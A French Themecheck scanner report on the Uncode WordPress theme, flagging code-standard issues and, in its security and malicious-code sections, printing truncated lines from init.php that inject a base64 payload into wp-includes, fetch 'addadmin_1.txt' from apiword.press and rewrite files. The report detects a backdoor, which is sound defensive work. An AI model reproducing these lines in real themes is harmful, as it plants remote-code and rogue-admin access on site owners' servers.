0
Résultats de validation

Uncode

Uncode

WordPress 6.5.4 theme
0
Ce thème n'est peut être pas libre. Themecheck ne distribue pas de thèmes commerciaux.
Alertes critiques
  1. Title : Title Les tags <title> ne peuvent contenir qu'un appe à wp_title(). wp_title filter soit être utilisée pour modifier la sortie.
  2. Failles de sécurité : Utilisation de base64_decode() base64_decode trouvé dans le fichier vc_gallery.php.
    Ligne164: $items = json_decode( base64_decode( strip_tags( $items ) ), true);
    base64_decode trouvé dans le fichier uncode_index.php.
    Ligne301: $items = json_decode( base64_decode( strip_tags( $items ) ), true);
    base64_decode trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Ligne89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    base64_decode trouvé dans le fichier radium-importer.php.
    Ligne587: $options = unserialize( base64_decode( $data ) );
  3. Présence d'iframes : Les iframes sont parfois utilisées pour charger du contenu non désirés ou du code malicieux sur des sites tiers <iframe width="100%" scrolling="no" frameborder="no" src="' . $iframe_url . '&color='.$accent_color.'&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false"> trouvé dans le fichier helpers.php.
    Ligne513: $media_oembed = '<iframe width='100%' scrolling='no' frameborder='no' src='' . $iframe_url .
    <iframe width="100%" scrolling="no" frameborder="no" src="' . $iframe_url . '&color='.$accent_color.'&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false"> trouvé dans le fichier elements.php.
    Ligne137: $content_html = '<iframe width='100%' scrolling='no' frameborder='no' src='' . $iframe_url .
  4. Code malveillant : Opérations sur système de fichiers file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_put_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_get_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Ligne144: if ($file = file_get_contents($e[1]))
    Ligne156: if ($file = @file_get_contents(__FILE__))
    file_put_contents trouvé dans le fichier init.php.
    Ligne40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Ligne44: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Ligne160: @file_put_contents(__FILE__, $file);
    fopen trouvé dans le fichier parsers.php.
    Ligne419: $fp = $this->fopen( $file, 'r' );
    Ligne637: function fopen( $filename, $mode = 'r' ) {
    Ligne640: return fopen( $filename, $mode );
    fclose trouvé dans le fichier parsers.php.
    Ligne468: $this->fclose($fp);
    Ligne655: function fclose( $fp ) {
    Ligne658: return fclose( $fp );
    fopen trouvé dans le fichier parsers.php.
    Ligne419: $fp = $this->fopen( $file, 'r' );
    Ligne637: function fopen( $filename, $mode = 'r' ) {
    Ligne640: return fopen( $filename, $mode );
    fopen trouvé dans le fichier parsers.php.
    Ligne419: $fp = $this->fopen( $file, 'r' );
    Ligne637: function fopen( $filename, $mode = 'r' ) {
    Ligne640: return fopen( $filename, $mode );
    fclose trouvé dans le fichier parsers.php.
    Ligne468: $this->fclose($fp);
    Ligne655: function fclose( $fp ) {
    Ligne658: return fclose( $fp );
    fclose trouvé dans le fichier parsers.php.
    Ligne468: $this->fclose($fp);
    Ligne655: function fclose( $fp ) {
    Ligne658: return fclose( $fp );
  5. Menu Admin : Les thèmes doivent utiliser add_theme_page () pour ajouter des pages admin. Fichier class-tgm-plugin-activation.php :
    Ligne724: $this->page_hook = add_submenu_page( $args['parent_slug'], $args['page_title'], $args['menu_ti
    Fichier media-enhanced.php :
    Ligne4: add_submenu_page( 'upload.php', esc_html__('Add oEmbed, external IMG, SVG c
    Fichier admin.php :
    Ligne9: add_menu_page( 'UNCODE', UNCODE_NAME, 'administrator', 'uncode-menu', 'unco
    Fichier admin.php :
    Ligne10: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__('System Status','unco
    Ligne1074: add_submenu_page( 'tools.php', 'Export', 'Export', 'manage_options', 'uncod
    Fichier admin.php :
    Ligne10: add_submenu_page( 'uncode-menu', 'UNCODE', esc_html__('System Status','unco
    Ligne1074: add_submenu_page( 'tools.php', 'Export', 'Export', 'manage_options', 'uncod
    Fichier related-posts.php :
    Ligne145: $menu_hook = add_submenu_page( 'uncode-menu', __( 'Related Posts', 'related-posts-for-wp
    Fichier ot-settings-api.php :
    Ligne99: $theme_check_bs   = 'add_menu_page';
    Fichier ot-settings-api.php :
    Ligne100: $theme_check_bs2  = 'add_submenu_page';
    Fichier ot-cleanup-api.php :
    Ligne82: $theme_check_bs = 'add_menu_page';
    Fichier font-system.php :
    Ligne55: $this->fonts_page_name = add_submenu_page('uncode-menu', 'Fonts', 'Fonts', 'edit_theme_options', 'un
    Ligne56: $this->settings_page_name = add_submenu_page('uncode-menu', 'Font Sources', 'Font Sources', 'edit_theme
    Fichier font-system.php :
    Ligne55: $this->fonts_page_name = add_submenu_page('uncode-menu', 'Fonts', 'Fonts', 'edit_theme_options', 'un
    Ligne56: $this->settings_page_name = add_submenu_page('uncode-menu', 'Font Sources', 'Font Sources', 'edit_theme
    Fichier radium-importer.php :
    Ligne88: add_submenu_page('uncode-menu', esc_html__('Install Demo','uncode'), esc_ht
  6. Fonctions obsolètes : screen_icon screen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Ligne1122: screen_icon();
  7. Inclusion de plugin : Présence de fichier zip Les plugins ne sont pas autorisés dans les thèmes. Le fichier zip uncode-child.zip layersliderwp-5.6.10.installable.zip revslider.zip vc_clipboard.zip uncode-related-posts-for-wp.zip uncode-core.zip uncode-js_composer.zip vcparticlesbackground.zip uncode-daves-wordpress-live-search.zip envato-wordpress-toolkit-master.zip a été trouvé.
Attention
  1. tags du thème : Présence de tags inconnusTag inconnu trouvé dans l'entête du fichier style.css.
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments dans le fichier footer.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments dans le fichier elements.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments dans le fichier headers.php.Une fonction de traduction utilisée sans text-domain. Fonction __, avec les arguments dans le fichier headers.php.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont uncode, woocommerce, tgmpa, option-tree, related-posts-for-wp, dot, uncodefont, radium, wordpress-importer.
  3. Eléments custom : Présence d'une entête customAucune référence à custom header n'a été trouvée dans le thème.
  4. Fonctions obsolètes : screen_iconscreen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Ligne1122: screen_icon();
  5. Editor style : Présence de l'édition de styleAucune référence à add_editor_style() n'a été trouvée dans le thème. Il est recommandé que le thème implémente l'édition de style, de manière à faire correspondre le contenu de l'éditeur l'affichage dans le thème.
  6. Implémentation de l'internationalisation : Utilisation correcte de ___al(La variable $footer_content a été trouvée dans une fonction de traduction dans le fichier footer.php . Les appels de fonctions de traduction ne doivent pas contenir de variables PHP. La variable $block_text a été trouvée dans une fonction de traduction dans le fichier elements.php . Les appels de fonctions de traduction ne doivent pas contenir de variables PHP. La variable $this a été trouvée dans une fonction de traduction dans le fichier headers.php . Les appels de fonctions de traduction ne doivent pas contenir de variables PHP. La variable $this a été trouvée dans une fonction de traduction dans le fichier headers.php . Les appels de fonctions de traduction ne doivent pas contenir de variables PHP.
  7. Image à la une ("Featured image") : Utilisation de the_post_thumbnail() instead of custom fields for thumbnailsAucune référence à the_post_thumbnail n'a été trouvée dans le thème.
  8. Screenshot : Copie d'écranMauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Liens statiques : Présence de liens codés en durLien potentiellement codés en dur trouvé dans le fichier media-enhanced.php.
    Ligne293: <h2><?php esc_html_e('Add oEmbed, external IMG, SVG code, HTML or Shortcode','uncode'); ?> <a href='upload.php?page=add-other' class='add-new-h2'><?php esc_html_e('Add New','u
    Ligne371: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other'; ?>' value='<?php esc_html_e('Save','uncode'); ?
    Ligne375: <input name='save' type='submit' class='button button-primary button-large' id='publish' data-url='<?php echo get_site_url().'/wp-admin/upload.php?page=add-other&postid='.$_REQUEST['postid'].'&updated=1'; ?>' va
    Lien potentiellement codés en dur trouvé dans le fichier font-system.php.
    Ligne376: You will need to create a <a href='http://fontdeck.com'>Fontdeck</a> Project to access your fonts from Fontdec
    Lien potentiellement codés en dur trouvé dans le fichier radium-importer.php.
    Ligne122: <li><?php printf(wp_kses(__('Deactivate all the plugins except the one listed  %s under the section \'Plugins used in the Uncode demo site\' if you are planning to use them.','uncode'), array( 'a' => array( 'href' => array() ) ) ) , '<a href='http://www.undsgn.com/uncode/documentation/plugins-installation/'>'.esc_htm
    Ligne403: result = 'Ooops, the Demo Content couldn\'t be imported all in once. Please refer to this <a href='http://www.undsgn.com/uncode/documentation/cannot-install-demo-contents/' t
    Ligne420: thrownError = 'Ooops, the Demo Content couldn\'t be imported all in once. Please refer to this <a href='http://www.undsgn.com/uncode/documentation/cannot-install-demo-contents/' t
    Ligne403: result = 'Ooops, the Demo Content couldn\'t be imported all in once. Please refer to this <a href='http://www.undsgn.com/uncode/documentation/cannot-install-demo-contents/' t
    Ligne420: thrownError = 'Ooops, the Demo Content couldn\'t be imported all in once. Please refer to this <a href='http://www.undsgn.com/uncode/documentation/cannot-install-demo-contents/' t
  2. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  3. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  4. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  5. Fichiers optionnels : Présence du fichier-template de catégorie category.phpCe thème ne contient pas le fichier optionnel category.php.
  6. Fichiers optionnels : Présence du fichier-template des tags tag.phpCe thème ne contient pas le fichier optionnel tag.php.
  7. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  8. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  9. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  10. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  11. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  12. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : Data.php
    Ligne67: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : admin.php
    Ligne4: require_once 'admin-pages/welcome.php';
    Ligne702: require_once ('edit_custom_walker.php');
    Ligne943: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Ligne1094: require_once( 'export/uncode_export_template.php' );
    Ligne1190: require_once(ABSPATH . 'wp-admin/includes/file.php');
    Ligne1255: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : init.php
    Ligne43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : customizer-woocommerce.php
    Ligne202: include_once( get_template_directory() . '/woocommerce/widgets/widget-price
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : welcome.php
    Ligne61: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : uncode-ajax.php
    Ligne11: require_once( $wp_root_path . '/wp-load.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : ot-loader.php
    Ligne553: include_once( $file );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : font-system.php
    Ligne614: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : init.php
    Ligne14: require_once( dirname( __FILE__ ) . '/importer/radium-importer.php' ); //lo
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : parsers.php
    Ligne62: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Ligne268: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : radium-importer.php
    Ligne132: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Ligne487: require_once($class_wp_importer);
    Ligne502: require_once($class_wp_import);
    Ligne516: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Ligne568: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Ligne671: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : wordpress-importer.php
    Ligne167: require_once (ABSPATH . '/wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Other checked themes